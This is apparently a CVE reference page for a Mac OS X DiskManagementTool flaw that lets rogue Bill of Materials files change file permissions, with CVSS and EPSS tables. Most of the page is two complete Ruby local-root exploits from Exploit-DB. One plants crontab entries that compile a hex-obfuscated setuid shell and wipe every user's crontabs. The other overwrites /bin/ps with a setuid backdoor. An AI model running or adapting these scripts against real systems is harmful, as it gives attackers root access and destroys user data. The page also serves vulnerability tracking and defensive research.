CPE, which stands for Common Platform Enumeration, is a standardized naming scheme for hardware, software and operating systems. CPE provides a structured naming scheme to uniquely identify and classify IT systems, platforms and software packages based on attributes such as vendor, product name, version, update, edition and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common attack patterns used by adversaries in cyberattacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
DiskManagementTool in the DiskManagement.framework 92.29 on Mac OS X 10.4.8 does not properly validate Bill of Materials (BOM) files, which allows attackers to gain privileges via a BOM file under /Library/Receipts/, which triggers arbitrary file permission changes upon execution of a diskutil permission repair operation.
CVE information
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 10 | | AV:N/AC:L/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the probability that a vulnerability will be exploited.
EPSS score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
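| Date | EPSS V0 | EPSS V1 | EPSS V2 (> 2022-02-04) | EPSS V3 (> 2025-03-07) | EPSS V4 (> 2025-03-17) |
|---|---|---|---|---|---|
| 2022-02-06 | – | – | 3.69% | – | – |
| 2022-04-03 | – | – | 3.69% | – | – |
| 2022-04-10 | – | – | 3.69% | – | – |
| 2022-10-23 | – | – | 3.69% | – | – |
| 2023-01-01 | – | – | 3.69% | – | – |
| 2023-01-15 | – | – | 3.69% | – | – |
| 2023-03-12 | – | – | – | 0.73% | – |
| 2023-09-03 | – | – | – | 0.71% | – |
| 2024-02-11 | – | – | – | 0.71% | – |
| 2024-06-02 | – | – | – | 0.71% | – |
| 2024-06-02 | – | – | – | 0.71% | – |
| 2024-06-30 | – | – | – | 0.71% | – |
| 2024-12-22 | – | – | – | 0.71% | – |
| 2025-03-02 | – | – | – | 0.71% | – |
| 2025-01-19 | – | – | – | 0.71% | – |
| 2025-03-09 | – | – | – | 0.71% | – |
| 2025-03-18 | – | – | – | – | 5.75% |
| 2025-03-30 | – | – | – | – | 6.5% |
| 2025-04-15 | – | – | – | – | 6.5% |
| 2025-04-15 | – | – | – | – | 6.5% |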
EPSS percentile
The percentile is used to rank CVEs by their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. The percentile thus serves to compare a CVE's EPSS score against that of other CVEs.
Publication date: 2007-01-04 23:00 +00:00 Author: MoAB EDB Verified: Yes
#!/usr/bin/ruby
# (c) 2006 LMH <lmh [at] info-pull.com> (code from the other exploit, porting)
# Kevin Finisterre <kf_lists [at] digitalmunition.com> (crontab rock and roll)
#
# Second exploit for MOAB-05-01-2007, uses crontab. much more simple than the other one.
# And works like a charm.
require 'fileutils'
EVIL_COMMANDS = [
"rm /Library/Receipts/Essentials.pkg/Contents/Archive.bom ",
"echo -e \"\\x6d\\x61\\x69\\x6e\\x28\\x29\\x7b\\x20\\x73\\x65\\x74\\x65\\x75\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x65\\x74\\x65\\x67\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x65\\x74\\x75\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x65\\x74\\x67\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x79\\x73\\x74\\x65\\x6d\\x28\\x22\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x20\\x2d\\x69\\x22\\x29\\x3b\\x20\\x7d\\x0a\" > /tmp/finisterre.c",
"/usr/bin/cc -o /Users/Shared/shX /tmp/finisterre.c; rm /tmp/finisterre.c",
"/bin/cp -r /var/cron/tabs /Users/Shared", # I have no legit crontabs so I don't care.
"/usr/bin/say Flavor Flave a k a `whoami` && sleep 5 && /usr/bin/say sleeping briefly && sleep 5 && chmod +s /Users/Shared/shX && sleep 5",
"echo '' > /tmp/pwnclean",
"for each in `ls /var/cron/tabs/`; do crontab -u $each /tmp/pwnclean; done", # Sorry if you had any legit crontabs...
"crontab /tmp/pwnclean", # Just to make sure
"rm -rf /tmp/pwn*",
]
TARGET_BOM_PATH = "/Library/Receipts/Essentials.pkg/Contents/Archive.bom"
SHELL_TEMPLATE = "mkdir -p /tmp/pwndertino/var/cron/tabs\n" +
"cd /tmp/pwndertino\n" +
"chmod 777 var/cron/tabs\n" +
"mkbom . /tmp/pwned.bom\n" +
"cp /tmp/pwned.bom #{TARGET_BOM_PATH}\n" +
"/usr/sbin/diskutil repairPermissions /\n"
if ARGV[0] != "repair"
# Backup if its there! Some times it is not.
if File.exists?(TARGET_BOM_PATH)
FileUtils.cp(TARGET_BOM_PATH, File.join("/Users/Shared", File.basename(TARGET_BOM_PATH)))
end
puts "++ Dropping the 31337 .sh skillz"
shell_script = File.new("moab5.sh", "w")
shell_script.print(SHELL_TEMPLATE)
puts "++ Fixing up crontabs"
EVIL_COMMANDS.each do |cmd|
shell_script.print("echo '* * * * * #{cmd}' >> /var/cron/tabs/root\n")
end
shell_script.print("echo '* * * * * /bin/rm -rf /tmp/pwned.bom /tmp/pwndertino' >> /tmp/pwncron\n")
shell_script.print("crontab /tmp/pwncron\n") # You may need to sleep here
shell_script.close
puts "++ Execute moab5.sh"
FileUtils.chmod 0755, "./moab5.sh"
exec "/bin/sh", "-c", "./moab5.sh"
puts "++ Run the repair script when you are all done."
else
# minor repair for a post-testing scenario
if File.exists?(File.join("/Users/Shared", File.basename(TARGET_BOM_PATH)))
FileUtils.cp(File.join("/Users/Shared", File.basename(TARGET_BOM_PATH)), TARGET_BOM_PATH) # restore backup
FileUtils.rm_f(File.join("/Users/Shared", File.basename(TARGET_BOM_PATH)))
exec "/usr/sbin/diskutil repairPermissions /"
else
exec "/usr/sbin/diskutil repairPermissions /"
end
end
# milw0rm.com [2007-01-05]
Publication date: 2007-01-04 23:00 +00:00 Author: MoAB EDB Verified: Yes
#!/usr/bin/ruby
# (c) 2006 LMH <lmh [at] info-pull.com>
# Kevin Finisterre <kf_lists [at] digitalmunition.com>
#
# Thanks to The French Connection for bringing this in-the-wild 0-day to
# our attention. If /tmp/ps2 exists on your system, you've been pwned already.
# Thanks to the original authors of the exploit ('meow'). You know who you are.
#
# "They did it for the lulz" - A Fakecure spokesperson on the 'Mother Of all Bombs'.
# "kcoc kcus I ro tcarter uoY" - The Original Drama P3dobear (Kumo' n').
#
require 'fileutils'
# Basic configuration
TARGET_BINARY = "/bin/ps" # Changing this requires you to create a new TEH_EVIL_BOM
TARGET_BACKUP_PATH = "/tmp/ps2" # see: "man lsbom" and "man mkbom"
TARGET_SHELL_PATH = "/usr/bin/id" # Ensure the binary doesn't drop privileges!
BOMARCHIVE_PATH = "/Library/Receipts/Essentials.pkg/Contents/Archive.bom"
DISKUTIL_PATH = "/usr/sbin/diskutil"
TEH_EVIL_BOM = File.read("Evil.bom")
#
# Repair a rogue installation using the back-up files. Useful for testing.
# Probably you don't want to repair on real pwnage... :-)
#
def do_repair()
puts "++ Repairing (moving back-ups to original path)"
puts "++ #{File.basename(BOMARCHIVE_PATH)}"
FileUtils.rm_f BOMARCHIVE_PATH
FileUtils.cp File.join("/tmp", File.basename(BOMARCHIVE_PATH)), BOMARCHIVE_PATH
puts "++ #{TARGET_BINARY}"
FileUtils.rm_f TARGET_BINARY
FileUtils.cp TARGET_BACKUP_PATH, TARGET_BINARY
puts "++ Removing back-ups..."
FileUtils.rm_f TARGET_BACKUP_PATH
FileUtils.rm_f File.join("/tmp", File.basename(BOMARCHIVE_PATH))
puts "++ Done. Repairing disk permissions..."
exec "#{DISKUTIL_PATH} repairPermissions /"
end
#
# Overwrite TARGET_BINARY with TARGET_SHELL_PATH and set the rogue permissions unless
# they are already properly set.
#
def exploit_bomb()
puts "++ We get signal. Overwriting #{TARGET_BINARY} with #{TARGET_SHELL_PATH}."
# Overwriting with this method will always work well if binary at TARGET_SHELL_PATH
# is bigger than TARGET_BINARY (ex. /bin/sh is 1068844 bytes and /bin/ps is 68432).
# An alternative method is running diskutil again to set the rogue permissions.
over = File.new(TARGET_BINARY, "w")
over.write(File.read(TARGET_SHELL_PATH))
over.close
unless FileTest.setuid?(TARGET_BINARY)
fork do
FileUtils.rm_f TARGET_BINARY
FileUtils.cp TARGET_SHELL_PATH, TARGET_BINARY
exec "#{DISKUTIL_PATH} repairPermissions /"
end
Process.wait
end
puts "++ Done. Happy ruuting."
end
#
# Overwrite the BOM with the rogue version, set new permissions.
#
def set_up_the_bomb()
puts "++ Preparing to overwrite (#{BOMARCHIVE_PATH})"
# Back-up the original Archive.bom, set mode to 777
if FileTest.writable?(BOMARCHIVE_PATH)
backup_path = File.join("/tmp", File.basename(BOMARCHIVE_PATH))
unless FileTest.exists?(backup_path)
puts "++ Creating backup copy at #{backup_path}"
FileUtils.cp BOMARCHIVE_PATH, backup_path
end
puts "++ Removing original file."
FileUtils.rm_f BOMARCHIVE_PATH
puts "++ Writing backdoor BOM file."
target_bom = File.new(BOMARCHIVE_PATH, "w")
target_bom.write(TEH_EVIL_BOM)
target_bom.close
puts "++ Done."
else
puts "-- Can't write to '#{BOMARCHIVE_PATH}. No pwnage for you today."
exit
end
# Back-up the target backdoor path
unless FileTest.exists?(TARGET_BACKUP_PATH)
puts "++ Creating backup copy of #{TARGET_BINARY} at #{TARGET_BACKUP_PATH}"
FileUtils.cp TARGET_BINARY, TARGET_BACKUP_PATH
end
# Let diskutil do it's job (set permissions over target binary path, setuid)
puts "++ Running diskutil to set the new permissions for the backdoor..."
fork do
exec "#{DISKUTIL_PATH} repairPermissions /"
end
Process.wait
puts "++ Somebody set up us the bomb!"
exploit_bomb()
end
# Here be pwnies
if ARGV[0] == "repair"
do_repair()
else
set_up_the_bomb()
end
# milw0rm.com [2007-01-05]